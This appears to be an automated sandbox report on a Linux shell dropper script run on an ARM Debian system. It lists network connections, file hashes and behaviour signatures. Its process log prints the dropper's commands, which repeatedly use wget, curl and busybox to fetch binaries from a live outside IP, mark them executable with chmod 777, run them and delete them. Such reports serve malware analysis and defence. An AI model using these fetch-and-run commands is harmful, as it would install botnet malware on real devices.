/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
[./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/rm
[rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/wget
[wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/chmod
[chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
[./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/rm
[rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/wget
[wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/chmod
[chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
[./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/rm
[rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.9:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 02:38
Reported
2024-11-14 02:41
Platform
debian9-armhf-20240729-en
Max time kernel
37s
Max time network
39s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | N/A |
| N/A | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | N/A |
| N/A | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | N/A |
| N/A | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | N/A |
| N/A | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | N/A |
| N/A | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | N/A |
| N/A | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | N/A |
| N/A | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | N/A |
| N/A | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | N/A |
| N/A | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | N/A |
| N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | N/A |
| N/A | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | N/A |
| N/A | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | N/A |
| N/A | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | N/A |
| N/A | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | N/A |
| N/A | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | N/A |
| N/A | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | N/A |
| N/A | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | N/A |
| N/A | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | N/A |
| N/A | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | N/A |
| N/A | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | N/A |
| N/A | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | N/A |
| N/A | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | N/A |
| N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | N/A |
| N/A | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | N/A |
| N/A | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /usr/bin/curl | N/A |
Processes
/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/chmod
[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/rm
[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/wget
[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/chmod
[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/rm
[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/wget
[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/chmod
[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/rm
[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/wget
[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/chmod
[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/rm
[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/wget
[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/chmod
[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/rm
[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/wget
[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/chmod
[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/rm
[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/wget
[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/chmod
[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/rm
[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/wget
